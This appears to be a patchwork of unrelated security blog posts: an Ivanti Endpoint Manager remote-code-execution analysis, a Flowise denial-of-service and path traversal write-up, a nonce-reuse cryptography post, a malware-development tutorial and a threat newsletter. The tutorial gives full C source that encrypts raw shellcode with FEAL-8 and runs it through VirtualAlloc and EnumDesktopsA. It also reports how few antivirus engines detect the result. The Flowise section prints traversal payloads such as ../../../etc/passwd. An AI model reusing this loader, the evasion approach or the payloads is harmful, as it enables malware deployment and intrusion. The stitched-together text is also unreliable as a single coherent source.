I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.
Back to the Basics: MiniDumpWriteDump The most common way of dumping the memory of a process is to call MiniDumpWriteDump. It requires a process handle with sufficient access rights, a process ID, a handle to an output file, and a value representing the “dump type” (such as MiniDumpWithFullMemory). BOOL MiniDumpWriteDump( [in] HANDLE hProcess, // Target pro...
We initially wrote this post in reference to CVE-2024-29847, however this post actually describes CVE-2023-28324. We had incorrectly assumed that the SU5 update was comprehensive which resulted in us mistaking CVE-2023-28324 for CVE-2024-29847. The content of this blog has been updated accordingly.
Introduction
Ivanti Endpoint Manager (EPM) is an enterprise endpoint management solution that allows for centralized management of devices within an organization. On June 7th, 2023, Ivanti released an advisory describing a improper input vulnerability resulting in remote code execution with a CVSS score of 9.8. In this post we detail the internal workings of this vulnerability. Our POC can be found here.
AgentPortal
The vulnerability exists in a service named AgentPortal. A quick search shows us that we can find the file at C:\Program Files\LanDesk\ManagementSuite\AgentPortal.exe. Upon further investigation, we find that it is a .NET binary.
AgentPortal.exe Details
After loading AgentPortal.exe into JetBrains dotPeek for decompilation, we find that its not a very complicated program. It’s main responsibility is creating a .NET Remoting service for the IAgentPortal interface.
AgentPortal OnStart
IAgentPortal Interface
The IAgentPortal interface is pretty simple, it consists of functions to create Requests and other functions to get the results and check the status of those requests. Digging into what kind of requests we can make, we find the ActionEnum enum.
ActionEnum
We are immediately drawn to the RunProgram option. The handler for that option shows a very easy way for an attacker to run an arbitrary program.
ProcessRunProgramAction
The Fix
The fix for this vulnerability restricts what kind of programs can be ran by ProcessRunProgramAction to ping.exe and tracert.exe.
ProcessRunProgramAction fix
Indicators of Compromise
The port used by the AgentPortal service can be found in the registry at Computer\HKEY_LOCAL_MACHINE\SOFTWARE\LANDesk\SharedComponents\LANDeskAgentPortal.
AgentPortal Registry Entry
Any unexpected connections to the AgentPortal address in your environment should be investigated for malicious activity.
CVE-2024–8182 : Accidental Discovery of an Unauthenticated DoS
While reviewing some LLM related products with the team, we came across FlowiseAI.
FlowiseAI is an open-source tool for building conversational AI applications and chatbots. It provides a low-code platform with a visual interface that allows users to create AI workflows by connecting different nodes and components.
Seeing that the product was already affected by several weaknesses, in particular CVE-2024–31621, we thought it would be particularly interesting to see if any other weaknesses could be discovered.
The result was the discovery of several vulnerabilities, including two currently published with a CVE number
CVE-2024–8182 : An Unauthenticated Denial of Service
This was discovered by Tenable Research while working on web application security.
This blog post focuses on the second discovery which turned out to be an accidental discovery.
An examination of CVE-2024–31621 reveals that Flowise exposes various unauthenticated endpoints, among which we can find /api/v1/get-upload-file/ which allows a user chatting with a model to retrieve content used (eg an image) during a conversation.
When a chat is initiated and it contains a document, a request is made to the URL
Using this endpoint and following the flow of function calls, we come across the streamStorageFile constant, whose purpose is to retrieve the requested file.
In our case, we’re not using Bucket (S3) for storage, so we fall in the else part line 299 that seeks to retrieve a file locally.
An unauthenticated endpoint fetching a local file, the perfect conditions for testing different path traversal cases.
A few remarks about the piece of code we’re watching
// path.join() automatically resolves relative paths and `..` sequences // so it "always" creates a normalized path const filePath = path.join(getStoragePath(), chatflowId, chatId, filename)
// So the checks path.isAbsolute() and filePath.includes() are // therefore unnecessary here if (filePath.includes('..')) throw new Error(`Invalid file path`) if (!path.isAbsolute(filePath)) throw new Error(`Invalid file path`)
With these 3 lines, we could say that finally the only value that matters is fileName and that we can place our payload there such as ../../../etc/passwd.
// Path.join() performs the normalization and the value // obtained for this is now /etc/passwd const filePath = path.join(getStoragePath(), '1', '2', '/../../../etc/passwd')
//only return from the storage folder if (!filePath.startsWith(getStoragePath())) throw new Error(`Invalid file path`)
The filePath value must start with a specific path, which by default corresponds to the /root/.flowise/storage folder.
without going into details, in our case this file is not very interesting and greatly reduces the impact of the vulnerability.
However, while running a few tests, I noticed at one point that my instance was no longer responding. I had put a simple dot in the parameter name
On the code side, it looks like this
// Path.join() performs the normalization and the value // obtained for this is now /root/.flowise/storage const filePath = path.join(getStoragePath(), '.', '.', '.')
// This condition is validated because getStoragePath() == filePath if (!filePath.startsWith(getStoragePath())) throw new Error(`Invalid file path`)
// fs.existsSync checks whether a file or directory exists // at the specified location if (fs.existsSync(filePath)) { // fs.createReadStream create a read stream for the specified file return fs.createReadStream(filePath) } else { throw new Error(`File ${fileName} not found`) }
Among the various problems posed by this implementation, the problem here is that fs.existsSync() doesn’t distinguish between a file and a directory, except that fs.createReadStream() expects to receive a file.
As the value supplied is a directory, an unhandled exception is thrown and the application crashes.
To date, despite several reminders and the acknowledgement of other vulnerabilities, the Flowise team has not followed up and has not informed us of a potential fix.
If you’ve encountered cryptography software, you’ve probably heard the advice to never use a nonce twice—in fact, that’s where the word nonce (number used once) comes from. Depending on the cryptography involved, a reused nonce can reveal encrypted messages, or even leak your secret key! But common knowledge may not cover every possible way to accidentally reuse nonces. Sometimes, the techniques that are supposed to prevent nonce reuse have subtle flaws.
This blog post tells a cautionary tale of what can go wrong when implementing a relatively basic type of cryptography: a bidirectional encrypted channel, such as an encrypted voice call or encrypted chat. We’ll explore how more subtle issues of this type can arise in a network with several encrypted channels, and we’ll describe a bug we discovered in a client’s threshold signature scheme. In that implementation, none of the parties involved ever used the same nonce twice. However, because they used the same sequence of nonce values, two different senders could accidentally use the same nonce as each other. An attacker could have used this issue to tamper with messages, or make honest parties appear malicious.
Figure 1: Don’t let your drunk friend drive, or use your nonce!
How we make encrypted channels
Encrypting messages—making the meaning of a message hidden, even to a third party that has full access to the content of a message—is probably the oldest activity we’d recognize as “cryptography.” The core structure of today’s message encryption stretches back at least to the polyalphabetic ciphers of the 1500s, and goes as follows:
To encrypt:
Take the secret message and separate it into regular-sized sections (or “blocks”). The overall data in each section is treated as a single “symbol.”
Substitute each symbol with a different symbol, depending on the secret, the position in the message, and possibly also on previous symbols in the message.
Send the now-encrypted message.
To decrypt:
Take the encrypted message, and separate it into blocks.
Substitute each symbol using the reverse of the encryption procedure, again using the secret, the position, and possibly the previous symbols.
Read the now-decrypted message.
The security of this scheme relies on third parties being unable to infer data about the symbol-substitution procedure just by looking at the encrypted data.
Historically, many ciphers have been broken by observing patterns within individual encrypted messages (Alan Turing’s Banburismus technique, which broke the Nazi Navy’s Enigma encryption, is a famous example).
Modern ciphers are designed to completely eliminate these patterns within messages, if properly used. First, our substitution alphabets are much larger—two commonly used stream ciphers, AES-CTR and ChaCha20, use block sizes of 128 and 256, respectively. That means the alphabets have 2128 and 2256 symbols, respectively. Next, there are rules used to ensure that every symbol in a message gets a different substitution table. If you treat every symbol in the same way, you risk revealing patterns in the underlying message, as in the classic ECB penguin!
Figure 3: The image after encryption with ECB mode (source)
Finally, and most importantly for this story, you need to ensure that every message is treated differently—which is where nonces come in.
Numbers, but only once
The AES-CTR and ChaCha20 stream ciphers are both “counter-mode” stream ciphers. Counter-mode ciphers use a very simplistic type of substitution table: map the ith block, with the value x_i to x_i XOR F(i), where F is a a so-called “pseudorandom function” derived from the secret key1. To see how this works, let’s start again with our trusty image of Tux, and an image generated from AES-CTR’s pseudorandom function:
Figure 4: The original image again
Figure 5: Image generated from AES-CTR’s pseudorandom function
When we XOR the pseudorandom image with Tux, Tux vanishes in the noise:
Figure 6: XOR of the pseudorandom image with Tux
It might not be obvious that this actually still has Tux in it—but if you closely watch the animation below, you can see the outline of Tux as it switches from the original noise to the encrypted version of Tux:
Figure 7: Animation of mixing Tux with the AES-CTR output; notice the visible outline of Tux
And if we XOR this with the noise again, Tux returns!
Figure 8: Tux visible again after XOR
This lets us both encrypt and decrypt data, so long as you know the function F used to generate the pseudorandom data.
But if we aren’t careful, we might reveal too much. Let’s start with a different image, but the same noise:
If we XOR the image and the noise together, Beastie, like Tux, vanishes:
Figure 11: Beastie disappears in noise
But if we now XOR these two encrypted messages, suddenly we can tell what they originally were!
Figure 12: Beastie and Tux reappear when the two encrypted messages are XORed
What went wrong? Well, we used the exact same noise in each encrypted message. In real encrypted channels, the pseudorandom function F we use to generate our noise gets an extra parameter, called the “nonce,” or “number used once.” As the name suggests, that number should be unique for each message. If you ever reuse a nonce, a third party who sees two encrypted messages can learn the XOR of the plaintext. However, so long as you never reuse a nonce, a good pseudorandom function will generate completely different noise given two different nonces2. By tweaking the above experiment to use the nonce 1 for Tux and the nonce 2 for the Beastie, the XOR of the two messages is still incomprehensible noise:
Figure 13: Encrypted Tux
Figure 14: Encrypted Beastie
Figure 15: XOR of the previous two images
Which brings us to the bug.
The bug
Our client was implementing a threshold signature scheme. The signing process in a threshold signature scheme requires a lot of communication between all parties. Some communication is broadcast, and some is peer-to-peer. For security, the peer-to-peer communication needs to be both private and tamper-resistant, so the implementation uses an authenticated encryption scheme called ChaCha20-Poly1305, which combines the ChaCha20 stream cipher with Poly1305, a Polynomial Message Authentication Code.
Let’s consider a three-party example with Alice, Bob, and Carol. To create her peer-to-peer channels, Alice establishes two different shared secrets, s_B and s_C, with Bob and with Carol respectively, via Diffie-Hellman key exchange. Then, Alice sets up a global “nonce counter”: every time Alice sends a message, she sends it with the current value of the counter, then increments the counter. That way she will absolutely never send two messages with the same nonce, even on different channels!
Unfortunately, all parties initialize the counter at the same value (0), increment it at the same rate, and send messages in the same order. So in the first step, when Alice sends a message to Bob, and Bob sends a message to Alice, they both use the secret s_B and the nonce 0! So an eavesdropper who intercepts both these messages can learn their XORed contents. Likewise, Bob and Carol will send each other messages with nonce 1, and then in the next round Alice and Bob will both use nonce 2. Alice and Carol will always use different nonces to each other, however—Alice is Carol’s first recipient, and Carol is Alice’s second—so the Alice-to-Carol nonces will always be odd and the Carol-to-Alice nonces will always be even.
In the actual system where this bug occurred, the messages that use the same nonce happen to be very structured and the important fields that get XORed are, themselves, pseudorandom. This meant that an eavesdropper couldn’t learn enough to perform a direct exploit using these messages. However, this particular nonce reuse did leak the message-authentication key, and would have allowed a person in the middle to tamper with certain messages and cause other participants to treat honest parties as potentially malicious.
How to fix it
Whenever you have a communication channel, it’s extremely important to properly manage the nonces involved to ensure that no nonce is ever repeated. A quick-and-dirty method would be to divide the space of nonces between parties. In the example above, Alice and Carol coincidentally always had different nonce parity, and you could make that deliberate: in each channel, you have some way to designate one party as “odd” and one party as “even,” and then, to send the message with the nonce n, you actually use 2n if you’re the even party, and 2n+1 if you’re the odd one3.
However, a much better scheme is to have entirely separate keys for each direction: in other words, Alice encrypts messages to Bob with a secret s_AB and decrypts messages from Bob with s_BA. Likewise, Bob encrypts with s_BA and decrypts with s_AB. This is what is done by the [Noise Protocol Framework], which requires that you use different CipherState objects for sending and receiving. There are a few different ways to derive these “directional keys” from a single shared secret, but generally, we recommend using a well-vetted existing implementation of a well-vetted scheme, like the Noise Protocol Framework. Many of these issues have been proactively handled in such implementations.
Don’t reuse nonces!
At the end of the day, it’s important to evaluate every assumption and restriction of a cryptographic system carefully, and to make sure that all your mitigations actually address the threat as it is. An easy mental simplification of Nonce reuse is “don’t send two messages with the same nonce”—and in that simplified model, the global nonce counter works! However, the actual threat of nonce reuse doesn’t care who sends the message—and if anyone sends a message with the same key and nonce, you’re at risk.
Most prominent encrypted-channel libraries handle this safely, but if you find you need to implement a solution like this, consider reaching out to us for a cryptographic review.
1Although this is a faithful description of counter-mode encryption, many functions that are called “pseudorandom” are completely unsuitable for use in encryption. Whenever possible, use well-vetted stream ciphers and follow industry best practices. 2Some encryption schemes have various restrictions beyond just avoiding nonce reuse – in some schemes, having overly long messages can lead to nonce-reuse-like issues. Some schemes have different recommendations depending on whether you generate nonces randomly or with a counter. In general, please use a well-vetted encryption implementation and ensure that you follow all recommendations in the relevant specification or standard. 3This requires decreasing the effective nonce size by 1 bit, so in general, we don’t recommend it!
Hello, cybersecurity enthusiasts and white hackers!
This post is the result of my own research on using FEAL-8 block cipher on malware development. As usual, exploring various crypto algorithms, I decided to check what would happen if we apply this to encrypt/decrypt the payload.
FEAL
Akihiro Shimizu and Shoji Miyaguchi from NTT Japan developed this algorithm. A 64-bit block and key are used. The goal was to create an algorithm similar to DES but with a stronger round function. The algorithm can run faster with fewer rounds. Unfortunately, reality did not meet the design objectives.
The encryption procedure begins with a 64-bit chunk of plaintext. First, the data block is XORed using 64-key bits. The data block is then divided into left and right halves. The left half is combined with the right half to create a new right half. The left and new right halves go through n rounds (four at first). In each round, the right half is combined with 16-bits of key material (via function f) and then XORed with the left half to create the new right half. The new left half is formed from the original right half (before the round). After n rounds (remember not to switch the left and right halves after the nth round), the left half is XORed with the right half to create a new right half, which is then concatenated to produce a 64-bit whole. The data block is XORed with another 64-bits of key material before the algorithm concludes.
practical example
First of all, we need rotl function:
// rotate left 1 bituint32_trotl(uint32_tx,intshift){return(x<<shift)|(x>>(32-shift));}
This function performs a left bitwise rotation on a 32-bit unsigned integer (x). It shifts the bits of x to the left by a specified number of positions (shift), while the bits that overflow on the left side are moved to the right side. Bitwise rotations are commonly used in cryptographic algorithms to introduce diffusion and obfuscate patterns in data.
Next one is the F function:
uint32_tF(u32x1,u32x2){returnrotl((x1^x2),2);}
This function is the core mixing function in the FEAL-8 algorithm. It takes two 32-bit values (x1 and x2), applies a bitwise XOR (^) to them, and then rotates the result to the left by 2-bits using the previously defined rotl function. This helps to increase the nonlinearity of the encryption process.
Next one is G function:
// function G used in FEAL-8voidG(uint32_t*left,uint32_t*right,uint8_t*roundKey){uint32_ttempLeft=*left;*left=*right;*right=tempLeft^F(*left,*right)^*(uint32_t*)roundKey;}
The G function is the main transformation function in each round of FEAL-8. It operates on the left and right halves of the data block. It performs the following steps:
Saves the left half (tempLeft).
Sets the left half equal to the right half (*left = *right)
Updates the right half with the XOR of tempLeft, the result of the F function, and the round key.
This function performs the key transformations in each round of FEAL-8 and introduces the necessary diffusion and confusion in the data block. The XOR operation and the F function help mix the data and make the encryption resistant to attacks.
The key schedule function generates a series of round subkeys from the main encryption key (key). It creates a different subkey for each of the 8-rounds of FEAL-8. In each round, the key schedule performs an XOR operation between each byte of the key and the sum of the round index (i) and the byte index (j):
// key schedule for FEAL-8voidkey_schedule(uint8_t*key){for(inti=0;i<ROUNDS;i++){for(intj=0;j<8;j++){K[i][j]=key[j]^(i+j);}}}
Then, the next one is encryption logic:
// FEAL-8 encryption functionvoidfeal8_encrypt(uint32_t*block,uint8_t*key){uint32_tleft=block[0],right=block[1];// perform 8 rounds of encryptionfor(inti=0;i<ROUNDS;i++){G(&left,&right,K[i]);}// final swapping of left and rightblock[0]=right;block[1]=left;}
This function performs FEAL-8 encryption on a 64-bit data block (split into two 32-bit halves: left and right). It performs 8-rounds of encryption by applying the G function with the appropriate round key in each round.
Decryption logic:
// FEAL-8 decryption functionvoidfeal8_decrypt(uint32_t*block,uint8_t*key){uint32_tleft=block[0],right=block[1];// perform 8 rounds of decryption in reversefor(inti=ROUNDS-1;i>=0;i--){G(&left,&right,K[i]);}// final swapping of left and rightblock[0]=right;block[1]=left;}
And shellcode encryption and decryption logic:
// function to encrypt shellcode using FEAL-8voidfeal8_encrypt_shellcode(unsignedchar*shellcode,intshellcode_len,uint8_t*key){key_schedule(key);// Generate subkeysinti;uint32_t*ptr=(uint32_t*)shellcode;for(i=0;i<shellcode_len/BLOCK_SIZE;i++){feal8_encrypt(ptr,key);ptr+=2;}// handle remaining bytes by padding with 0x90 (NOP)intremaining=shellcode_len%BLOCK_SIZE;if(remaining!=0){unsignedcharpad[BLOCK_SIZE]={0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90};memcpy(pad,ptr,remaining);feal8_encrypt((uint32_t*)pad,key);memcpy(ptr,pad,remaining);}}// function to decrypt shellcode using FEAL-8voidfeal8_decrypt_shellcode(unsignedchar*shellcode,intshellcode_len,uint8_t*key){key_schedule(key);// Generate subkeysinti;uint32_t*ptr=(uint32_t*)shellcode;for(i=0;i<shellcode_len/BLOCK_SIZE;i++){feal8_decrypt(ptr,key);ptr+=2;}// handle remaining bytes with paddingintremaining=shellcode_len%BLOCK_SIZE;if(remaining!=0){unsignedcharpad[BLOCK_SIZE]={0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90};memcpy(pad,ptr,remaining);feal8_decrypt((uint32_t*)pad,key);memcpy(ptr,pad,remaining);}}
First function is responsible for encrypting the provided shellcode (meow-meow messagebox in our case) using FEAL-8 encryption. It processes the shellcode in 64-bit blocks (8-bytes), and if there are any remaining bytes that do not fit into a full block, it pads them with 0x90 (NOP) before encrypting.
Finally, main function demonstrates encrypting, decrypting, and executing shellcode using FEAL-8.
and the decrypted payload is executed using the EnumDesktopsA function.
The full source code is looks like this (hack.c):
/*
* hack.c
* encrypt/decrypt payload via FEAL-8 algorithm
* author: @cocomelonc
* https://cocomelonc.github.io/malware/2024/09/12/malware-cryptography-32.html
*/#include<stdio.h>
#include<stdint.h>
#include<string.h>
#include<stdlib.h>
#include<windows.h>#define ROUNDS 8 // FEAL-8 uses 8 rounds of encryption
#define BLOCK_SIZE 8 // FEAL-8 operates on 64-bit (8-byte) blocks
// subkeys generated from the main keyuint8_tK[ROUNDS][8];// rotate left 1 bituint32_trotl(uint32_tx,intshift){return(x<<shift)|(x>>(32-shift));}// function F used in FEAL-8uint32_tF(uint32_tx1,uint32_tx2){returnrotl((x1^x2),2);}// function G used in FEAL-8voidG(uint32_t*left,uint32_t*right,uint8_t*roundKey){uint32_ttempLeft=*left;*left=*right;*right=tempLeft^F(*left,*right)^*(uint32_t*)roundKey;}// key schedule for FEAL-8voidkey_schedule(uint8_t*key){for(inti=0;i<ROUNDS;i++){for(intj=0;j<8;j++){K[i][j]=key[j]^(i+j);}}}// FEAL-8 encryption functionvoidfeal8_encrypt(uint32_t*block,uint8_t*key){uint32_tleft=block[0],right=block[1];// perform 8 rounds of encryptionfor(inti=0;i<ROUNDS;i++){G(&left,&right,K[i]);}// final swapping of left and rightblock[0]=right;block[1]=left;}// FEAL-8 decryption functionvoidfeal8_decrypt(uint32_t*block,uint8_t*key){uint32_tleft=block[0],right=block[1];// perform 8 rounds of decryption in reversefor(inti=ROUNDS-1;i>=0;i--){G(&left,&right,K[i]);}// final swapping of left and rightblock[0]=right;block[1]=left;}// function to encrypt shellcode using FEAL-8voidfeal8_encrypt_shellcode(unsignedchar*shellcode,intshellcode_len,uint8_t*key){key_schedule(key);// Generate subkeysinti;uint32_t*ptr=(uint32_t*)shellcode;for(i=0;i<shellcode_len/BLOCK_SIZE;i++){feal8_encrypt(ptr,key);ptr+=2;}// handle remaining bytes by padding with 0x90 (NOP)intremaining=shellcode_len%BLOCK_SIZE;if(remaining!=0){unsignedcharpad[BLOCK_SIZE]={0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90};memcpy(pad,ptr,remaining);feal8_encrypt((uint32_t*)pad,key);memcpy(ptr,pad,remaining);}}// function to decrypt shellcode using FEAL-8voidfeal8_decrypt_shellcode(unsignedchar*shellcode,intshellcode_len,uint8_t*key){key_schedule(key);// Generate subkeysinti;uint32_t*ptr=(uint32_t*)shellcode;for(i=0;i<shellcode_len/BLOCK_SIZE;i++){feal8_decrypt(ptr,key);ptr+=2;}// handle remaining bytes with paddingintremaining=shellcode_len%BLOCK_SIZE;if(remaining!=0){unsignedcharpad[BLOCK_SIZE]={0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90};memcpy(pad,ptr,remaining);feal8_decrypt((uint32_t*)pad,key);memcpy(ptr,pad,remaining);}}intmain(){unsignedcharmy_payload[]="\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41""\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60""\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72""\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac""\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2""\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48""\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f""\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49""\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01""\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01""\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1""\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41""\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b""\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58""\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41""\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7""\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e""\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83""\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd""\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0""\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff""\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e""\x2e\x2e\x5e\x3d\x00";intmy_payload_len=sizeof(my_payload);intpad_len=my_payload_len+(BLOCK_SIZE-my_payload_len%BLOCK_SIZE)%BLOCK_SIZE;unsignedcharpadded[pad_len];memset(padded,0x90,pad_len);// pad with NOPsmemcpy(padded,my_payload,my_payload_len);printf("original shellcode:\n");for(inti=0;i<my_payload_len;i++){printf("%02x ",my_payload[i]);}printf("\n\n");uint8_tkey[8]={0x12,0x34,0x56,0x78,0x9A,0xBC,0xDE,0xF0};feal8_encrypt_shellcode(padded,pad_len,key);printf("encrypted shellcode:\n");for(inti=0;i<pad_len;i++){printf("%02x ",padded[i]);}printf("\n\n");feal8_decrypt_shellcode(padded,pad_len,key);printf("decrypted shellcode:\n");for(inti=0;i<my_payload_len;i++){printf("%02x ",padded[i]);}printf("\n\n");// allocate and execute decrypted shellcodeLPVOIDmem=VirtualAlloc(NULL,my_payload_len,MEM_COMMIT,PAGE_EXECUTE_READWRITE);RtlMoveMemory(mem,padded,my_payload_len);EnumDesktopsA(GetProcessWindowStation(),(DESKTOPENUMPROCA)mem,NULL);return0;}
So, this example demonstrates how to use the FEAL-8 encryption algorithm to encrypt and decrypt payload. For checking correctness, added printing logic.
demo
Let’s go to see everything in action. Compile it (in my linux machine):
As you can see, only 25 of 74 AV engines detect our file as malicious.
cryptoanalysis
Historically, FEAL-4, a four-round FEAL, was successfully cryptanalyzed using a chosen-plaintext attack before being demolished. Sean Murphy’s later approach was the first known differential-cryptanalysis attack, requiring only 20 chosen plaintexts. The designers responded with an 8-round FEAL, which Biham and Shamir cryptanalyzed at the SECURICOM '89 conference (A. Shamir and A. Fiat, “Method, Apparatus and Article for Identification and Signature,” U.S. Patent #4,748,668, 31 May 1988). Another chosen-plaintext attack against FEAL-8 (H. Gilbert and G. Chase, “A Statistical Attack on the Feal–8 Cryptosystem,” Advances in Cryptology—CRYPTO’90 Proceedings, Springer–Verlag, 1991, pp. 22–33), utilizing just 10,000 blocks, caused the creators to give up and define FEAL-N, with a variable number of rounds (of course more than 8).
Biham and Shamir used differential cryptanalysis to break FEAL-N faster than brute force (with 2^64 selected plaintext encryptions) for N < 32. FEAL-16 needed 2^28 chosen plaintexts or 2^46.5 known plaintexts to break. FEAL-8 needed 2000 chosen plaintexts or 2^37.5 known plaintexts to break. FEAL-4 could be cracked with only eight carefully chosen plaintexts.
I hope this post is useful for malware researchers, C/C++ programmers, spreads awareness to the blue teamers of this interesting encrypting technique, and adds a weapon to the red teamers arsenal.
This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q3 2024. It was last updated on September 12, 2024.JulyWe terminated 89 Y…
I have written about the dreaded “cybersecurity skills gap” more times than I can remember in this newsletter, but I feel like it’s time to revisit this topic again.
That’s because the White House announced a new initiative last week for the U.S. government called the “Service for America” initiative designed to train new workers in the cybersecurity field. This measure directs U.S. federal agencies to help recruit and prepare Americans for jobs in cybersecurity and AI by removing certain degree requirements and emphasizing skills-based hiring. This means, hopefully, more educational resources for people looking to break into cybersecurity.
On its face, I’m all in favor of this. I did eventually go back to school to get my associate's degree in cybersecurity, but much of what I’ve learned about this field has been from working at Talos and spending time around my talented and intelligent colleagues, many of whom did not go to college for cybersecurity.
My concern is that, even if we do train these employees and give them the proper skills, it’s on companies to eventually hire them.
A June report from CyberSeek found that there are only enough skilled workers to fill 85 percent of cybersecurity jobs in America. Yet hiring in the industry has remained flat, according to a soon-to-be-released report from cybersecurity non-profit ISC2. This year, the global security workforce is estimated to be 5.5 million, which is only a 0.1 percent increase year over year, according to the report.
Among the more than 15,000 cybersecurity practitioners from around the globe who responded to the study, 38 percent of respondents said their organizations had experienced a cybersecurity hiring freeze over the past year, up 8 percent from 2023. Thirty-seven percent of respondents reported budget cuts to the security program, and another 25 percent said their teams had experienced layoffs.
That same CyberSeek report also found that, in the U.S., the amount of cybersecurity-related job postings decreased by 29 percent year-over-year.
So as these skills gap-closing programs begin, we need to be thinking about what skills, exactly, managers want their workers to be trained in. There is obviously some sort of disconnect here between the people who want to work in security compared to the companies or managers who want to hire them. Or there just simply isn’t enough money to go around right now to handle staffing up cybersecurity teams, and that’s just the reality of the current economy in the U.S. and globally.
I’m not saying this to discourage anyone from entering the security space or spread doom and gloom. But I do think it’s important to acknowledge that there are many already skilled and trained workers who simply cannot find work or are treading water throwing dozens of applications at the wall to see what sticks.
I’ve seen too many people posting on LinkedIn recently looking for a cybersecurity job to think that the solution to bolstering security is getting *another* worker in with the same skillset to compete for the same job opening as someone who’s been in the industry for 10 years.
The one big thing
Talos recently uncovered a new threat called “DragonRank” that primarily targets countries in Asia — and a few in Europe — operating PlugX and BadIIS for search engine optimization (SEO) rank manipulation. DragonRank exploits targets’ web application services to deploy a web shell and utilizes it to collect system information and launch malware such as PlugX and BadIIS, running various credential-harvesting utilities. Their PlugX not only used familiar sideloading techniques, but the Windows Structured Exception Handling (SEH) mechanism ensures that the legitimate file can load the PlugX without raising suspicion.
Why do I care?
This group compromises Windows Internet Information Services (IIS) servers hosting corporate websites, with the intention of implanting the BadIIS malware. BadIIS is malware used to manipulate search engine crawlers and disrupt the SEO of the affected sites. With those compromised IIS servers, DragonRank can distribute the scam website to unsuspecting users. DragonRank engages in SEO manipulation by altering or exploiting search engine algorithms to improve a website's ranking in search results. They conduct these attacks to drive traffic to malicious sites, increase the visibility of fraudulent content, or disrupt competitors by artificially inflating or deflating rankings. These attacks can harm a company's online presence, lead to financial losses, and damage its reputation by associating the brand with deceptive or harmful practices. The actor then takes these compromised websites and promotes them, effectively turning these sites into platforms for scam operations.
So now what?
Talos released a new Snort rule set and several ClamAV signatures to detect and block the malware used in these attacks. Talos has confirmed more than 35 IIS servers had been compromised and deployed the BadIIS malware across a diverse array of geographic regions, including Thailand, India, Korea, Belgium, Netherlands and China in this campaign, so it’s clearly still active and potentially growing.
Top security headlines of the week
A new type of attack called “RAMBO” could allow adversaries to steal data over air-gapped networks with RAM radio signals. An Israeli academic researcher recently announced the discovery of RAMBO (Radiation of Air-gapped Memory Bus for Offense), in which an attacker could generate electromagnetic radiation from a device’s RAM to send data from air-gapped computers. Air-gapped systems are otherwise offline networks that are extremely isolated, often used in critical environments like government agencies, weapons systems and nuclear power stations. While RAMBO does not pose a threat for any hacker with access to the internet, it could open the door for insider threats with access to the network to deploy malware through physical media like USB drives or supply chain attacks. RAMBO could allow attackers to seal encoded files, encryption keys, images, keystrokes and biometric information from these systems at a rate of 1,000 bits per second. Researchers conducted tests into these types of attacks over distances of up to 23 feet. A technical paper published on the topic includes several potential mitigations, including RAM jamming, external EM jamming and Faraday enclosures around potentially targeted systems. (Bleeping Computer, SecurityWeek)
Commercial spyware makers are still finding ways to bypass government sanctions and, in some cases, have made their tools harder to detect. A new report from the Atlantic Council found that “Most available evidence suggests that spyware sales are a present reality and likely to continue.” The report specifically highlights increased activity from Intellexa and the NSO Group, two companies known for creating and selling spyware tools that have been targeted over the past few years by international sanctions. These companies, and specifically Intellexa, have found ways to work around sanctions by restructuring their businesses with subsidiaries, partners and other relationships spread across multiple geographic areas. Intellexa is known for creating the Predator spyware, while the NSO Group is infamous for the Pegasus spyware. Both pieces of software often target high-risk individuals, sometimes by governments, such as journalists, politicians and activists. Security researchers also recently found that Intellexa has established new infrastructure in the Democratic Republic of the Congo and Angola, making “it more difficult for researchers and cybersecurity defenders to track the spread of Predator.” (Dark Reading, The Register)
Several Western intelligence agencies have formally charged the Russian GRU for carrying out cyber attacks against Ukraine designed to disrupt aid efforts. Government agencies in the U.S., U.K. and several other countries blamed Unit 29155, which has been linked to past espionage campaigns, with targeting government and civilian agencies and civil society organizations in Western Europe, the EU and NATO after Russia invaded Ukraine in 2022. Intelligence agencies in the Netherlands, Czech Republic, Germany, Estonia, Latvia, Canada and Australia all signed the declaration. They also formally blamed Unit 29155 for the WhisperGate campaign, a coordinated attack on Ukrainian government agencies in January 2022 that seemed to set the stage for a physical ground invasion. The announcement stated that WhisperGate has since been used to “scout and disrupt” aid deliveries to Ukraine. When Talos first reported on WhisperGate in 2022, our researchers stated that “attackers used stolen credentials in the campaign and they likely had access to the victim network for months before the attack, a typical characteristic of sophisticated advanced persistent threat (APT) operations.” (Reuters, BBC)
